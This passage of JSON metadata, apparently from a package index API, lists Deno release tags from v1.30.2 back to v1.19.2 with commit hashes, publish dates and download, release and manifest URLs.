mit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://g